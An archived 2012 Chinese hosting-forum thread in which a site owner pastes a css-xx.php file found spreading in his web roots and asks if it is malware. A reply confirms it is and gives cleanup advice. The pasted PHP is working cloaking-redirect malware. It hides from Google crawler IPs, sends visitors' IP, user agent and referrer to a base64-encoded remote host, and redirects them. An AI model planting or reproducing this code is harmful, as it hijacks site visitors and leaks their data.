网站根目录下发现很多css-xx.php文件，是中毒了吗？

Bigcar 发表于 2012-8-12 10:43:22

home/wwwroot/www.xx.com/
所有网站根目录下发现好多css-xx.php的文件，有蔓延迹象，是不是病毒啊

参考了一个网站，英文太差，应该是中毒了 http://blog.sucuri.net/2011/01/weekly-malware-update-%E2%80%93-2010jan14.html

随便贴一个 css-anh.php

<!--?
error_reporting(0);

$xred=base64_decode('aHR0cDovLzk1LjIxMS4xMzMuMTY0LzFhd2VydG9tZXMv');

$ips = array("209.185.108", "209.185.253", "209.85.238", "209.85.238.11", "209.85.238.4", "216.239.33.96", "216.239.33.97", "216.239.33.98", "216.239.33.99", "216.239.37.98", "216.239.37.99", "216.239.39.98", "216.239.39.99", "216.239.41.96", "216.239.41.97", "216.239.41.98", "216.239.41.99", "216.239.45.4", "216.239.46", "216.239.51.96", "216.239.51.97", "216.239.51.98", "216.239.51.99", "216.239.53.98", "216.239.53.99", "216.239.57.96", "216.239.57.97", "216.239.57.98", "216.239.57.99", "216.239.59.98", "216.239.59.99", "216.33.229.163", "64.233.173.193", "64.233.173.194", "64.233.173.195", "64.233.173.196", "64.233.173.197", "64.233.173.198", "64.233.173.199", "64.233.173.200", "64.233.173.201", "64.233.173.202", "64.233.173.203", "64.233.173.204", "64.233.173.205", "64.233.173.206", "64.233.173.207", "64.233.173.208", "64.233.173.209", "64.233.173.210", "64.233.173.211", "64.233.173.212", "64.233.173.213", "64.233.173.214", "64.233.173.215", "64.233.173.216", "64.233.173.217", "64.233.173.218", "64.233.173.219", "64.233.173.220", "64.233.173.221", "64.233.173.222", "64.233.173.223", "64.233.173.224", "64.233.173.225", "64.233.173.226", "64.233.173.227", "64.233.173.228", "64.233.173.229", "64.233.173.230", "64.233.173.231", "64.233.173.232", "64.233.173.233", "64.233.173.234", "64.233.173.235", "64.233.173.236", "64.233.173.237", "64.233.173.238", "64.233.173.239", "64.233.173.240", "64.233.173.241", "64.233.173.242", "64.233.173.243", "64.233.173.244", "64.233.173.245", "64.233.173.246", "64.233.173.247", "64.233.173.248", "64.233.173.249", "64.233.173.250", "64.233.173.251", "64.233.173.252", "64.233.173.253", "64.233.173.254", "64.233.173.255", "64.68.80", "64.68.81", "64.68.82", "64.68.83", "64.68.84", "64.68.85", "64.68.86", "64.68.87", "64.68.88", "64.68.89", "64.68.90.1", "64.68.90.10", "64.68.90.11", "64.68.90.12", "64.68.90.129", "64.68.90.13", "64.68.90.130", "64.68.90.131", "64.68.90.132", "64.68.90.133", "64.68.90.134", "64.68.90.135", "64.68.90.136", "64.68.90.137", "64.68.90.138", "64.68.90.139", "64.68.90.14", "64.68.90.140", "64.68.90.141", "64.68.90.142", "64.68.90.143", "64.68.90.144", "64.68.90.145", "64.68.90.146", "64.68.90.147", "64.68.90.148", "64.68.90.149", "64.68.90.15", "64.68.90.150", "64.68.90.151", "64.68.90.152", "64.68.90.153", "64.68.90.154", "64.68.90.155", "64.68.90.156", "64.68.90.157", "64.68.90.158", "64.68.90.159", "64.68.90.16", "64.68.90.160", "64.68.90.161", "64.68.90.162", "64.68.90.163", "64.68.90.164", "64.68.90.165", "64.68.90.166", "64.68.90.167", "64.68.90.168", "64.68.90.169", "64.68.90.17", "64.68.90.170", "64.68.90.171", "64.68.90.172", "64.68.90.173", "64.68.90.174", "64.68.90.175", "64.68.90.176", "64.68.90.177", "64.68.90.178", "64.68.90.179", "64.68.90.18", "64.68.90.180", "64.68.90.181", "64.68.90.182", "64.68.90.183", "64.68.90.184", "64.68.90.185", "64.68.90.186", "64.68.90.187", "64.68.90.188", "64.68.90.189", "64.68.90.19", "64.68.90.190", "64.68.90.191", "64.68.90.192", "64.68.90.193", "64.68.90.194", "64.68.90.195", "64.68.90.196", "64.68.90.197", "64.68.90.198", "64.68.90.199", "64.68.90.2", "64.68.90.20", "64.68.90.200", "64.68.90.201", "64.68.90.202", "64.68.90.203", "64.68.90.204", "64.68.90.205", "64.68.90.206", "64.68.90.207", "64.68.90.208", "64.68.90.21", "64.68.90.22", "64.68.90.23", "64.68.90.24", "64.68.90.25", "64.68.90.26", "64.68.90.273.190", "64.233.191", "66.249.64", "66.249.65", "66.249.66", "66.249.67", "66.249.68", "66.249.69", "66.249.70", "66.249.71", "66.249.72", "66.249.73", "66.249.74", "66.249.75", "66.249.76", "66.249.77", "66.249.78", "66.249.79", "66.249.80", "66.249.81", "66.249.82", "66.249.83", "66.249.84", "66.249.85", "66.249.86", "66.249.87", "66.249.88", "66.249.89", "66.249.90", "66.249.91", "66.249.92", "66.249.93", "66.249.94", "66.249.95");

$thisip = $_SERVER["REMOTE_ADDR"];
$isbot = false;
$zones = array(".AC", ".AD", ".AE", ".AERO", ".AF", ".AG", ".AI", ".AL", ".AM", ".AN", ".AO", ".AQ", ".AR", ".ARPA", ".AS", ".ASIA", ".AT", ".AU", ".AW", ".AX", ".AZ", ".BA", ".BB", ".BD", ".BE", ".BF", ".BG", ".BH", ".BI", ".BIZ", ".BJ", ".BM", ".BN", ".BO", ".BR", ".BS", ".BT", ".BV", ".BW", ".BY", ".BZ", ".CA", ".CAT", ".CC", ".CD", ".CF", ".CG", ".CH", ".CI", ".CK", ".CL", ".CM", ".CN", ".CO", ".COM", ".COOP", ".CR", ".CU", ".CV", ".CX", ".CY", ".CZ", ".DE", ".DJ", ".DK", ".DM", ".DO", ".DZ", ".EC", ".EDU", ".EE", ".EG", ".ER", ".ES", ".ET", ".EU", ".FI", ".FJ", ".FK", ".FM", ".FO", ".FR", ".GA", ".GB", ".GD", ".GE", ".GF", ".GG", ".GH", ".GI", ".GL", ".GM", ".GN", ".GOV", ".GP", ".GQ", ".GR", ".GS", ".GT", ".GU", ".GW", ".GY", ".HK", ".HM", ".HN", ".HR", ".HT", ".HU", ".ID", ".IE", ".IL", ".IM", ".IN", ".INFO", ".INT", ".IO", ".IQ", ".IR", ".IS", ".IT", ".JE", ".JM", ".JO", ".JOBS", ".JP", ".KE", ".KG", ".KH", ".KI", ".KM", ".KN", ".KP", ".KR", ".KW", ".KY", ".KZ", ".LA", ".LB", ".LC", ".LI", ".LK", ".LR", ".LS", ".LT", ".LU", ".LV", ".LY", ".MA", ".MC", ".MD", ".ME", ".MG", ".MH", ".MIL", ".MK", ".ML", ".MM", ".MN", ".MO", ".MOBI", ".MP", ".MQ", ".MR", ".MS", ".MT", ".MU", ".MUSEUM", ".MV", ".MW", ".MX", ".MY", ".MZ", ".NA", ".NAME", ".NC", ".NE", ".NET", ".NF", ".NG", ".NI", ".NL", ".NO", ".NP", ".NR", ".NU", ".NZ", ".OM", ".ORG", ".PA", ".PE", ".PF", ".PG", ".PH", ".PK", ".PL", ".PM", ".PN", ".PR", ".PRO", ".PS", ".PT", ".PW", ".PY", ".QA", ".RE", ".RO", ".RS", ".RU", ".RW", ".SA", ".SB", ".SC", ".SD", ".SE", ".SG", ".SH", ".SI", ".SJ", ".SK", ".SL", ".SM", ".SN", ".SO", ".SR", ".ST", ".SU", ".SV", ".SY", ".SZ", ".TC", ".TD", ".TEL", ".TF", ".TG", ".TH", ".TJ", ".TK", ".TL", ".TM", ".TN", ".TO", ".TP", ".TR", ".TT", ".TV", ".TW", ".TZ", ".UA", ".UG", ".UK", ".US", ".UY", ".UZ", ".VA", ".VC", ".VE", ".VG", ".VI", ".VN", ".VU", ".WF", ".WS", ".YE", ".YT", ".YU", ".ZA", ".ZM", ".ZW");

for ($i=0; $i<count($ips); $i++)
{
$curip = trim($ips[$i]);
if (strstr($thisip, $curip))
{
$isbot = true;
}
}

if (!$isbot)
{
$osystems = $_SERVER["HTTP_USER_AGENT"];
$osx = strchr($osystems,"Windows");
if (!$osx)
{
$isbot = true;
}

$browsers1=strchr($osystems,"Firefox");
$browsers2=strchr($osystems,"Chrome");
if ( ($browsers1) or ($browsers2) )
{
$isbot = true;
}
}

function xinclude ($path,$rt)
{
if (!function_exists ("file_get_contents"))
{
function file_get_contents ($addr)
{
$a = @fopen ($addr, "r");
$tmp = @fread ($a, sprintf ("%u", @filesize ($a)));
@fclose ($a);
if ($a) return @$tmp;
}
}

if (!function_exists ("file_put_contents"))
{
function file_put_contents ($addr, $con)
{
$a = @fopen ($addr, "w+");
if (!$a) return 0;
@fwrite ($a, $con);
@fclose ($a);
return @strlen ($con);
}
}

$content = file_get_contents ($path);
if ($content=="")
{
$curl = curl_init ();
curl_setopt ($curl, CURLOPT_URL, trim($path));
curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
$content = curl_exec ($curl);
curl_close($curl);
}
if ($content!="")
{
if ($rt==1) {return $content;}
}
}

if (!$isbot)
{
$agent7=base64_encode($_SERVER["HTTP_USER_AGENT"]);
$ip7=base64_encode($_SERVER["REMOTE_ADDR"]);
$ref7=base64_encode($_SERVER["HTTP_REFERER"]);
$xred="$xred?agent=$agent7&ip=$ip7&ref=$ref7";
$red_url_cur=xinclude("$xred","1");
$red_url_cur=trim($red_url_cur);
header("Location: $red_url_cur");
}

?>

完整的见附件

[ 本帖最后由 Bigcar 于 2012-8-12 10:54 编辑 ]

licess 发表于 2012-8-12 11:20:37

像是个攻击网站的脚本

可能网站程序有漏洞，最好是所有的目录都查一下，把可疑文件都删掉，换掉所有的密码
按https://www.vpser.net/security/lnmp-remove-nginx-php-execute.html 将能上传的目录执行权限去掉

页: [1]

VPS侦探论坛's Archiver

网站根目录下发现很多css-xx.php文件，是中毒了吗？